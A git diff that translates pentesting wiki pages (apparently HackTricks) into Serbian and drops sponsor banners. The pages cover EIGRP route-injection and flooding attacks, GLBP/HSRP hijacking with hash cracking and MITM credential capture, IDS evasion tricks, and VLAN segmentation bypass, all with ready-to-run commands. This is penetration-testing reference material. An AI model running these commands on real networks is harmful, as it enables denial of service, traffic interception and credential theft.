+**Detaljno objašnjenje tipova poruka DHCPv6:**
 
-1. **Solicit (1)**: Initiated by a DHCPv6 client to find available servers.
-2. **Advertise (2)**: Sent by servers in response to a Solicit, indicating availability for DHCP service.
-3. **Request (3)**: Clients use this to request IP addresses or prefixes from a specific server.
-4. **Confirm (4)**: Used by a client to verify if the assigned addresses are still valid on the network, typically after a network change.
-5. **Renew (5)**: Clients send this to the original server to extend address lifetimes or update configurations.
-6. **Rebind (6)**: Sent to any server to extend address lifetimes or update configurations, especially when no response is received to a Renew.
-7. **Reply (7)**: Servers use this to provide addresses, configuration parameters, or to acknowledge messages like Release or Decline.
-8. **Release (8)**: Clients inform the server to stop using one or more assigned addresses.
-9. **Decline (9)**: Sent by clients to report that assigned addresses are in conflict on the network.
-10. **Reconfigure (10)**: Servers prompt clients to initiate transactions for new or updated configurations.
-11. **Information-Request (11)**: Clients request configuration parameters without IP address assignment.
-12. **Relay-Forw (12)**: Relay agents forward messages to servers.
-13. **Relay-Repl (13)**: Servers reply to relay agents, who then deliver the message to the client.
+1. **Solicit (1)**: Pokreće ga DHCPv6 klijent da pronađe dostupne servere.
+2. **Advertise (2)**: Šalje ga server u odgovoru na Solicit, ukazujući na dostupnost za DHCP uslugu.
+3. **Request (3)**: Klijenti koriste ovo da zatraže IP adrese ili prefikse od određenog servera.
+4. **Confirm (4)**: Koristi ga klijent da proveri da li su dodeljene adrese još uvek važeće na mreži, obično nakon promene mreže.
+5. **Renew (5)**: Klijenti šalju ovo originalnom serveru da produže trajanje adresa ili ažuriraju konfiguracije.
+6. **Rebind (6)**: Šalje se bilo kojem serveru da produži trajanje adresa ili ažurira konfiguracije, posebno kada nije primljen odgovor na Renew.
+7. **Reply (7)**: Serveri koriste ovo da pruže adrese, parametre konfiguracije ili da potvrde poruke poput Release ili Decline.
+8. **Release (8)**: Klijenti obaveštavaju server da prestane da koristi jednu ili više dodeljenih adresa.
+9. **Decline (9)**: Šalje ga klijent da prijavi da su dodeljene adrese u sukobu na mreži.
+10. **Reconfigure (10)**: Serveri podstiču klijente da započnu transakcije za nove ili ažurirane konfiguracije.
+11. **Information-Request (11)**: Klijenti traže parametre konfiguracije bez dodeljivanja IP adrese.
+12. **Relay-Forw (12)**: Relay agenti prosleđuju poruke serverima.
+13. **Relay-Repl (13)**: Serveri odgovaraju relay agentima, koji zatim dostavljaju poruku klijentu.
 
-## References
+## Reference
 
 - [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages)
 
diff --git a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
index fe4b7247a..183376ce3 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
@@ -1,61 +1,61 @@
-# EIGRP Attacks
+# EIGRP Napadi
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**This is a summary of the attacks exposed in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Check it for further information.
+**Ovo je sažetak napada izloženih u** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9). Proverite za dodatne informacije.
 
-## **Fake EIGRP Neighbors Attack**
+## **Napad lažnih EIGRP suseda**
 
-- **Objective**: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack.
-- **Tool**: **helloflooding.py** script.
-- **Execution**:
-  %%%bash
-  ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
-  %%%
-- **Parameters**:
-  - `--interface`: Specifies the network interface, e.g., `eth0`.
-  - `--as`: Defines the EIGRP autonomous system number, e.g., `1`.
-  - `--subnet`: Sets the subnet location, e.g., `10.10.100.0/24`.
+- **Cilj**: Preopteretiti CPU rutera poplavom EIGRP hello paketa, što može dovesti do napada uskraćivanja usluge (DoS).
+- **Alat**: **helloflooding.py** skripta.
+- **Izvršenje**:
+%%%bash
+~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
+%%%
+- **Parametri**:
+- `--interface`: Određuje mrežni interfejs, npr., `eth0`.
+- `--as`: Definiše broj autonomnog sistema EIGRP, npr., `1`.
+- `--subnet`: Postavlja lokaciju podmreže, npr., `10.10.100.0/24`.
 
-## **EIGRP Blackhole Attack**
+## **EIGRP Crna rupa Napad**
 
-- **Objective**: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination.
-- **Tool**: **routeinject.py** script.
-- **Execution**:
-  %%%bash
-  ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
-  %%%
-- **Parameters**:
-  - `--interface`: Specifies the attacker’s system interface.
-  - `--as`: Defines the EIGRP AS number.
-  - `--src`: Sets the attacker’s IP address.
-  - `--dst`: Sets the target subnet IP.
-  - `--prefix`: Defines the mask of the target subnet IP.
+- **Cilj**: Poremetiti protok mrežnog saobraćaja injektovanjem lažne rute, što dovodi do crne rupe gde se saobraćaj usmerava na nepostojeću destinaciju.
+- **Alat**: **routeinject.py** skripta.
+- **Izvršenje**:
+%%%bash
+~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
+%%%
+- **Parametri**:
+- `--interface`: Određuje interfejs napadačevog sistema.
+- `--as`: Definiše EIGRP AS broj.
+- `--src`: Postavlja IP adresu napadača.
+- `--dst`: Postavlja IP adresu ciljne podmreže.
+- `--prefix`: Definiše masku ciljne podmreže.
 
-## **Abusing K-Values Attack**
+## **Napad zloupotrebe K-vrednosti**
 
-- **Objective**: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack.
-- **Tool**: **relationshipnightmare.py** script.
-- **Execution**:
-  %%%bash
-  ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
-  %%%
-- **Parameters**:
-  - `--interface`: Specifies the network interface.
-  - `--as`: Defines the EIGRP AS number.
-  - `--src`: Sets the IP Address of a legitimate router.
+- **Cilj**: Stvoriti kontinuirane prekide i ponovne veze unutar EIGRP domena injektovanjem izmenjenih K-vrednosti, što efektivno rezultira DoS napadom.
+- **Alat**: **relationshipnightmare.py** skripta.
+- **Izvršenje**:
+%%%bash
+~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
+%%%
+- **Parametri**:
+- `--interface`: Određuje mrežni interfejs.
+- `--as`: Definiše EIGRP AS broj.
+- `--src`: Postavlja IP adresu legitimnog rutera.
 
-## **Routing Table Overflow Attack**
+## **Napad preopterećenja tabele rutiranja**
 
-- **Objective**: To strain the router's CPU and RAM by flooding the routing table with numerous false routes.
-- **Tool**: **routingtableoverflow.py** script.
-- **Execution**:
-  %%%bash
-  sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
-  %%%
-- **Parameters**:
-  - `--interface`: Specifies the network interface.
-  - `--as`: Defines the EIGRP AS number.
-  - `--src`: Sets the attacker’s IP address.
+- **Cilj**: Opteretiti CPU i RAM rutera poplavom tabele rutiranja brojnim lažnim rutama.
+- **Alat**: **routingtableoverflow.py** skripta.
+- **Izvršenje**:
+%%%bash
+sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
+%%%
+- **Parametri**:
+- `--interface`: Određuje mrežni interfejs.
+- `--as`: Definiše EIGRP AS broj.
+- `--src`: Postavlja IP adresu napadača.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
index 77e1a445e..539b8c710 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
@@ -2,60 +2,56 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
 
 ## FHRP Hijacking Overview
 
 ### Insights into FHRP
 
-FHRP is designed to provide network robustness by merging multiple routers into a single virtual unit, thereby enhancing load distribution and fault tolerance. Cisco Systems introduced prominent protocols in this suite, such as GLBP and HSRP.
+FHRP je dizajniran da obezbedi robusnost mreže spajajući više rutera u jednu virtuelnu jedinicu, čime se poboljšava raspodela opterećenja i otpornost na greške. Cisco Systems je uveo istaknute protokole u ovom skupu, kao što su GLBP i HSRP.
 
 ### GLBP Protocol Insights
 
-Cisco's creation, GLBP, functions on the TCP/IP stack, utilizing UDP on port 3222 for communication. Routers in a GLBP group exchange "hello" packets at 3-second intervals. If a router fails to send these packets for 10 seconds, it is presumed to be offline. However, these timers are not fixed and can be modified.
+Cisco-ova kreacija, GLBP, funkcioniše na TCP/IP steku, koristeći UDP na portu 3222 za komunikaciju. Ruteri u GLBP grupi razmenjuju "hello" pakete na svakih 3 sekunde. Ako ruter ne pošalje ove pakete tokom 10 sekundi, smatra se da je van mreže. Međutim, ovi tajmeri nisu fiksni i mogu se modifikovati.
 
 ### GLBP Operations and Load Distribution
 
-GLBP stands out by enabling load distribution across routers using a single virtual IP coupled with multiple virtual MAC addresses. In a GLBP group, every router is involved in packet forwarding. Unlike HSRP/VRRP, GLBP offers genuine load balancing through several mechanisms:
+GLBP se izdvaja omogućavajući raspodelu opterećenja među ruterima koristeći jednu virtuelnu IP adresu u kombinaciji sa više virtuelnih MAC adresa. U GLBP grupi, svaki ruter učestvuje u prosleđivanju paketa. Za razliku od HSRP/VRRP, GLBP nudi pravu ravnotežu opterećenja kroz nekoliko mehanizama:
 
-- **Host-Dependent Load Balancing:** Maintains consistent AVF MAC address assignment to a host, essential for stable NAT configurations.
-- **Round-Robin Load Balancing:** The default approach, alternating AVF MAC address assignment among requesting hosts.
-- **Weighted Round-Robin Load Balancing:** Distributes load based on predefined "Weight" metrics.
+- **Host-Dependent Load Balancing:** Održava doslednu AVF MAC adresu dodeljenu hostu, što je bitno za stabilne NAT konfiguracije.
+- **Round-Robin Load Balancing:** Podrazumevani pristup, naizmenično dodeljujući AVF MAC adrese među zahtevima hostova.
+- **Weighted Round-Robin Load Balancing:** Raspodeljuje opterećenje na osnovu unapred definisanih "Weight" metrika.
 
 ### Key Components and Terminologies in GLBP
 
-- **AVG (Active Virtual Gateway):** The main router, responsible for allocating MAC addresses to peer routers.
-- **AVF (Active Virtual Forwarder):** A router designated to manage network traffic.
-- **GLBP Priority:** A metric that determines the AVG, starting at a default of 100 and ranging between 1 and 255.
-- **GLBP Weight:** Reflects the current load on a router, adjustable either manually or through Object Tracking.
-- **GLBP Virtual IP Address:** Serves as the network's default gateway for all connected devices.
+- **AVG (Active Virtual Gateway):** Glavni ruter, odgovoran za dodeljivanje MAC adresa peer ruterima.
+- **AVF (Active Virtual Forwarder):** Ruter zadužen za upravljanje mrežnim saobraćajem.
+- **GLBP Priority:** Metrika koja određuje AVG, počinje od podrazumevanih 100 i kreće se između 1 i 255.
+- **GLBP Weight:** Odražava trenutno opterećenje na ruteru, može se prilagoditi ručno ili putem Object Tracking-a.
+- **GLBP Virtual IP Address:** Služi kao podrazumevani prolaz mreže za sve povezane uređaje.
 
-For interactions, GLBP employs the reserved multicast address 224.0.0.102 and UDP port 3222. Routers transmit "hello" packets at 3-second intervals, and are considered non-operational if a packet is missed over a 10-second duration.
+Za interakcije, GLBP koristi rezervisanu multicast adresu 224.0.0.102 i UDP port 3222. Ruteri šalju "hello" pakete na svakih 3 sekunde, i smatraju se neoperativnim ako se paket propusti tokom 10 sekundi.
 
 ### GLBP Attack Mechanism
 
-An attacker can become the primary router by sending a GLBP packet with the highest priority value (255). This can lead to DoS or MITM attacks, allowing traffic interception or redirection.
+Napadač može postati glavni ruter slanjem GLBP paketa sa najvišom prioritetnom vrednošću (255). To može dovesti do DoS ili MITM napada, omogućavajući presretanje ili preusmeravanje saobraćaja.
 
 ### Executing a GLBP Attack with Loki
 
-[Loki](https://github.com/raizo62/loki_on_kali) can perform a GLBP attack by injecting a packet with priority and weight set to 255. Pre-attack steps involve gathering information like the virtual IP address, authentication presence, and router priority values using tools like Wireshark.
+[Loki](https://github.com/raizo62/loki_on_kali) može izvesti GLBP napad injektovanjem paketa sa prioritetom i težinom postavljenim na 255. Pre napada, koraci uključuju prikupljanje informacija kao što su virtuelna IP adresa, prisustvo autentifikacije i vrednosti prioriteta rutera koristeći alate kao što je Wireshark.
 
 Attack Steps:
 
-1. Switch to promiscuous mode and enable IP forwarding.
-2. Identify the target router and retrieve its IP.
-3. Generate a Gratuitous ARP.
-4. Inject a malicious GLBP packet, impersonating the AVG.
-5. Assign a secondary IP address to the attacker's network interface, mirroring the GLBP virtual IP.
-6. Implement SNAT for complete traffic visibility.
-7. Adjust routing to ensure continued internet access through the original AVG router.
+1. Prebacite se u promiscuous mode i omogućite IP prosleđivanje.
+2. Identifikujte ciljni ruter i preuzmite njegovu IP adresu.
+3. Generišite Gratuitous ARP.
+4. Injektujte zlonamerni GLBP paket, pretvarajući se da ste AVG.
+5. Dodelite sekundarnu IP adresu mrežnom interfejsu napadača, odražavajući GLBP virtuelnu IP.
+6. Implementirajte SNAT za potpunu vidljivost saobraćaja.
+7. Prilagodite rutiranje kako biste osigurali nastavak pristupa internetu kroz originalni AVG ruter.
 
-By following these steps, the attacker positions themselves as a "man in the middle," capable of intercepting and analyzing network traffic, including unencrypted or sensitive data.
-
-For demonstration, here are the required command snippets:
+Prateći ove korake, napadač se pozicionira kao "čovek u sredini", sposoban da presreće i analizira mrežni saobraćaj, uključujući nešifrovane ili osetljive podatke.
 
+Za demonstraciju, evo potrebnih komandi:
 ```bash
 # Enable promiscuous mode and IP forwarding
 sudo ip link set eth0 promisc on
@@ -69,78 +65,74 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
 sudo route del default
 sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
 ```
-
 Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network.
 
-### Passive Explanation of HSRP Hijacking with Command Details
+### Pasivno objašnjenje HSRP otmice sa detaljima komandi
 
-#### Overview of HSRP (Hot Standby Router/Redundancy Protocol)
+#### Pregled HSRP (Hot Standby Router/Redundancy Protocol)
 
-HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management.
+HSRP je Cisco-ov vlasnički protokol dizajniran za redundanciju mrežnih prolaza. Omogućava konfiguraciju više fizičkih rutera u jednu logičku jedinicu sa zajedničkom IP adresom. Ova logička jedinica se upravlja od strane primarnog rutera koji je odgovoran za usmeravanje saobraćaja. Za razliku od GLBP, koji koristi metrike poput prioriteta i težine za balansiranje opterećenja, HSRP se oslanja na jedan aktivni ruter za upravljanje saobraćajem.
 
-#### Roles and Terminology in HSRP
+#### Uloge i terminologija u HSRP
 
-- **HSRP Active Router**: The device acting as the gateway, managing traffic flow.
-- **HSRP Standby Router**: A backup router, ready to take over if the active router fails.
-- **HSRP Group**: A set of routers collaborating to form a single resilient virtual router.
-- **HSRP MAC Address**: A virtual MAC address assigned to the logical router in the HSRP setup.
-- **HSRP Virtual IP Address**: The virtual IP address of the HSRP group, acting as the default gateway for connected devices.
+- **HSRP Aktivni Ruter**: Uređaj koji deluje kao prolaz, upravljajući protokom saobraćaja.
+- **HSRP Standby Ruter**: Rezervni ruter, spreman da preuzme ako aktivni ruter otkaže.
+- **HSRP Grupa**: Skup rutera koji sarađuju kako bi formirali jedan otporniji virtuelni ruter.
+- **HSRP MAC Adresa**: Virtuelna MAC adresa dodeljena logičkom ruteru u HSRP postavci.
+- **HSRP Virtuelna IP Adresa**: Virtuelna IP adresa HSRP grupe, koja deluje kao podrazumevani prolaz za povezane uređaje.
 
-#### HSRP Versions
+#### HSRP Verzije
 
-HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacity, multicast IP usage, and virtual MAC address structure. The protocol utilizes specific multicast IP addresses for service information exchange, with Hello packets sent every 3 seconds. A router is presumed inactive if no packet is received within a 10-second interval.
+HSRP dolazi u dve verzije, HSRPv1 i HSRPv2, koje se razlikuju uglavnom u kapacitetu grupe, korišćenju multicast IP adresa i strukturi virtuelne MAC adrese. Protokol koristi specifične multicast IP adrese za razmenu informacija o usluzi, sa Hello paketima koji se šalju svake 3 sekunde. Ruter se smatra neaktivnim ako ne primi paket u intervalu od 10 sekundi.
 
-#### HSRP Attack Mechanism
+#### HSRP Mehanizam Napada
 
-HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis.
+HSRP napadi uključuju prisilno preuzimanje uloge Aktivnog Rutera ubrizgavanjem maksimalne vrednosti prioriteta. Ovo može dovesti do napada Man-In-The-Middle (MITM). Osnovni koraci pre napada uključuju prikupljanje podataka o HSRP postavci, što se može uraditi korišćenjem Wireshark-a za analizu saobraćaja.
 
-#### Steps for Bypassing HSRP Authentication
+#### Koraci za zaobilaženje HSRP Autentifikacije
 
-1. Save the network traffic containing HSRP data as a .pcap file.
-   ```shell
-   tcpdump -w hsrp_traffic.pcap
-   ```
-2. Extract MD5 hashes from the .pcap file using hsrp2john.py.
-   ```shell
-   python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
-   ```
-3. Crack the MD5 hashes using John the Ripper.
-   ```shell
-   john --wordlist=mywordlist.txt hsrp_hashes
-   ```
+1. Sačuvajte mrežni saobraćaj koji sadrži HSRP podatke kao .pcap datoteku.
+```shell
+tcpdump -w hsrp_traffic.pcap
+```
+2. Izvucite MD5 heš vrednosti iz .pcap datoteke koristeći hsrp2john.py.
+```shell
+python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
+```
+3. Razbijte MD5 heš vrednosti koristeći John the Ripper.
+```shell
+john --wordlist=mywordlist.txt hsrp_hashes
+```
 
-**Executing HSRP Injection with Loki**
+**Izvršavanje HSRP Injekcije sa Lokijem**
 
-1. Launch Loki to identify HSRP advertisements.
-2. Set the network interface to promiscuous mode and enable IP forwarding.
-   ```shell
-   sudo ip link set eth0 promisc on
-   sudo sysctl -w net.ipv4.ip_forward=1
-   ```
-3. Use Loki to target the specific router, input the cracked HSRP password, and perform necessary configurations to impersonate the Active Router.
-4. After gaining the Active Router role, configure your network interface and IP tables to intercept the legitimate traffic.
-   ```shell
-   sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
-   sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
-   ```
-5. Modify the routing table to route traffic through the former Active Router.
-   ```shell
-   sudo route del default
-   sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
-   ```
-6. Use net-creds.py or a similar utility to capture credentials from the intercepted traffic.
-   ```shell
-   sudo python2 net-creds.py -i eth0
-   ```
+1. Pokrenite Lokija da identifikujete HSRP oglase.
+2. Postavite mrežni interfejs u promiscuous mode i omogućite IP prosleđivanje.
+```shell
+sudo ip link set eth0 promisc on
+sudo sysctl -w net.ipv4.ip_forward=1
+```
+3. Koristite Lokija da ciljate specifični ruter, unesite razbijenu HSRP lozinku i izvršite potrebne konfiguracije da biste se pretvarali da ste Aktivni Ruter.
+4. Nakon preuzimanja uloge Aktivnog Rutera, konfigurišite svoj mrežni interfejs i IP tabele da biste presreli legitimni saobraćaj.
+```shell
+sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
+sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
+```
+5. Izmenite tabelu rutiranja da usmerite saobraćaj kroz bivšeg Aktivnog Rutera.
+```shell
+sudo route del default
+sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
+```
+6. Koristite net-creds.py ili sličan alat za prikupljanje kredencijala iz presretnutog saobraćaja.
+```shell
+sudo python2 net-creds.py -i eth0
+```
 
-Executing these steps places the attacker in a position to intercept and manipulate traffic, similar to the procedure for GLBP hijacking. This highlights the vulnerability in redundancy protocols like HSRP and the need for robust security measures.
+Izvršavanje ovih koraka stavlja napadača u poziciju da presreće i manipuliše saobraćajem, slično postupku za GLBP otmicu. Ovo naglašava ranjivost u protokolima redundancije poput HSRP i potrebu za robusnim bezbednosnim merama.
 
-## References
+## Reference
 
 - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
 
-

-
-{% embed url="https://websec.nl/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md
index fd94988fa..4ca41753b 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md
@@ -1,57 +1,45 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-

+# **TTL Manipulacija**
 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
+Pošaljite neke pakete sa TTL-om dovoljno visokim da stignu do IDS/IPS-a, ali ne dovoljno da stignu do konačnog sistema. Zatim, pošaljite još neke pakete sa istim sekvencama kao prethodni, tako da će IPS/IDS pomisliti da su to ponavljanja i neće ih proveravati, ali zapravo nose zlonamerni sadržaj.
 
-{% embed url="https://academy.8ksec.io/" %}
+**Nmap opcija:** `--ttlvalue `
 
-# **TTL Manipulation**
+# Izbegavanje potpisa
 
-Send some packets with a TTL enough to arrive to the IDS/IPS but not enough to arrive to the final system. And then, send another packets with the same sequences as the other ones so the IPS/IDS will think that they are repetitions and won't check them, but indeed they are carrying the malicious content.
+Jednostavno dodajte bespotrebne podatke u pakete kako bi se izbegao potpis IPS/IDS-a.
 
-**Nmap option:** `--ttlvalue `
+**Nmap opcija:** `--data-length 25`
 
-# Avoiding signatures
+# **Fragmentirani Paketi**
 
-Just add garbage data to the packets so the IPS/IDS signature is avoided.
+Jednostavno fragmentirajte pakete i pošaljite ih. Ako IDS/IPS nema mogućnost da ih ponovo sastavi, stići će do konačnog hosta.
 
-**Nmap option:** `--data-length 25`
+**Nmap opcija:** `-f`
 
-# **Fragmented Packets**
+# **Nevažeći** _**checksum**_
 
-Just fragment the packets and send them. If the IDS/IPS doesn't have the ability to reassemble them, they will arrive to the final host.
+Senzori obično ne računaju checksum iz razloga performansi. Tako da napadač može poslati paket koji će biti **interpretiran od strane senzora, ali odbijen od strane konačnog hosta.** Primer:
 
-**Nmap option:** `-f`
+Pošaljite paket sa RST flagom i nevažećim checksum-om, tako da će IPS/IDS možda pomisliti da ovaj paket zatvara vezu, ali konačni host će odbaciti paket jer je checksum nevažeći.
 
-# **Invalid** _**checksum**_
+# **Neobični IP i TCP opcije**
 
-Sensors usually don't calculate checksum for performance reasons. So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example:
+Senzor može zanemariti pakete sa određenim flagovima i opcijama postavljenim unutar IP i TCP zaglavlja, dok konačni host prihvata paket po prijemu.
 
-Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid.
+# **Preklapanje**
 
-# **Uncommon IP and TCP options**
+Moguće je da kada fragmentirate paket, postoji neka vrsta preklapanja između paketa (možda prvih 8 bajtova paketa 2 preklapa poslednjih 8 bajtova paketa 1, i poslednjih 8 bajtova paketa 2 preklapa prvih 8 bajtova paketa 3). Tada, ako IDS/IPS ponovo sastavi pakete na drugačiji način od konačnog hosta, biće interpretiran drugačiji paket.\
+Ili možda, 2 paketa sa istim pomakom dolaze i host mora odlučiti koji će uzeti.
 
-A sensor might disregard packets with certain flags and options set within IP and TCP headers, whereas the destination host accepts the packet upon receipt.
+- **BSD**: Ima prednost za pakete sa manjim _pomakom_. Za pakete sa istim pomakom, izabira prvi.
+- **Linux**: Kao BSD, ali preferira poslednji paket sa istim pomakom.
+- **Prvi** (Windows): Prva vrednost koja dođe, vrednost koja ostaje.
+- **Poslednji** (cisco): Poslednja vrednost koja dođe, vrednost koja ostaje.
 
-# **Overlapping**
-
-It is possible that when you fragment a packet, some kind of overlapping exists between packets (maybe first 8 bytes of packet 2 overlaps with last 8 bytes of packet 1, and 8 last bytes of packet 2 overlaps with first 8 bytes of packet 3). Then, if the IDS/IPS reassembles them in a different way than the final host, a different packet will be interpreted.\
-Or maybe, 2 packets with the same offset comes and the host has to decide which one it takes.
-
-- **BSD**: It has preference for packets with smaller _offset_. For packets with same offset, it will choose the first one.
-- **Linux**: Like BSD, but it prefers the last packet with the same offset.
-- **First** (Windows): First value that comes, value that stays.
-- **Last** (cisco): Last value that comes, value that stays.
-
-# Tools
+# Alati
 
 - [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke)
 
-

-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
index eaf5835eb..169eae3d3 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
@@ -2,34 +2,27 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-If direct access to a switch is available, VLAN segmentation can be bypassed. This involves reconfiguring the connected port to trunk mode, establishing virtual interfaces for target VLANs, and setting IP addresses, either dynamically (DHCP) or statically, depending on the scenario (**for further details check [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).**
+Ako je direktan pristup switch-u dostupan, VLAN segmentacija može biti zaobiđena. To uključuje reconfiguraciju povezanog porta u trunk mode, uspostavljanje virtuelnih interfejsa za ciljne VLAN-ove i postavljanje IP adresa, bilo dinamički (DHCP) ili statički, u zavisnosti od scenarija (**za više detalja proverite [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).**
 
-Initially, identification of the specific connected port is required. This can typically be accomplished through CDP messages, or by searching for the port via the **include** mask.
-
-**If CDP is not operational, port identification can be attempted by searching for the MAC address**:
+Prvo je potrebno identifikovati specifičan povezani port. To se obično može postići putem CDP poruka, ili pretraživanjem porta putem **include** maske.
 
+**Ako CDP nije operativan, identifikacija porta može se pokušati pretraživanjem MAC adrese**:
 ```
 SW1(config)# show mac address-table | include 0050.0000.0500
 ```
-
-Prior to switching to trunk mode, a list of existing VLANs should be compiled, and their identifiers determined. These identifiers are then assigned to the interface, enabling access to various VLANs through the trunk. The port in use, for instance, is associated with VLAN 10.
-
+Pre nego što se pređe u trunk režim, treba sastaviti listu postojećih VLAN-ova i odrediti njihove identifikatore. Ovi identifikatori se zatim dodeljuju interfejsu, omogućavajući pristup raznim VLAN-ovima putem trunk-a. Port koji se koristi, na primer, povezan je sa VLAN 10.
 ```
 SW1# show vlan brief
 ```
-
-**Transitioning to trunk mode entails entering interface configuration mode**:
-
+**Prelazak na trunk režim podrazumeva ulazak u režim konfiguracije interfejsa**:
 ```
 SW1(config)# interface GigabitEthernet 0/2
 SW1(config-if)# switchport trunk encapsulation dot1q
 SW1(config-if)# switchport mode trunk
 ```
+Prebacivanje u trunk režim će privremeno prekinuti konektivnost, ali se to može kasnije obnoviti.
 
-Switching to trunk mode will temporarily disrupt connectivity, but this can be restored subsequently.
-
-Virtual interfaces are then created, assigned VLAN IDs, and activated:
-
+Zatim se kreiraju virtuelni interfejsi, dodeljuju VLAN ID-ovi i aktiviraju:
 ```bash
 sudo vconfig add eth0 10
 sudo vconfig add eth0 20
@@ -40,25 +33,20 @@ sudo ifconfig eth0.20 up
 sudo ifconfig eth0.50 up
 sudo ifconfig eth0.60 up
 ```
-
-Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured:
-
+Nakon toga, zahtev za adresu se šalje putem DHCP-a. Alternativno, u slučajevima kada DHCP nije izvodljiv, adrese se mogu ručno konfigurisati:
 ```bash
 sudo dhclient -v eth0.10
 sudo dhclient -v eth0.20
 sudo dhclient -v eth0.50
 sudo dhclient -v eth0.60
 ```
-
-Example for manually setting a static IP address on an interface (VLAN 10):
-
+Primer za ručno postavljanje statičke IP adrese na interfejsu (VLAN 10):
 ```bash
 sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
 ```
+Konekcija se testira pokretanjem ICMP zahteva ka podrazumevanim prolazima za VLAN-ove 10, 20, 50 i 60.
 
-Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60.
-
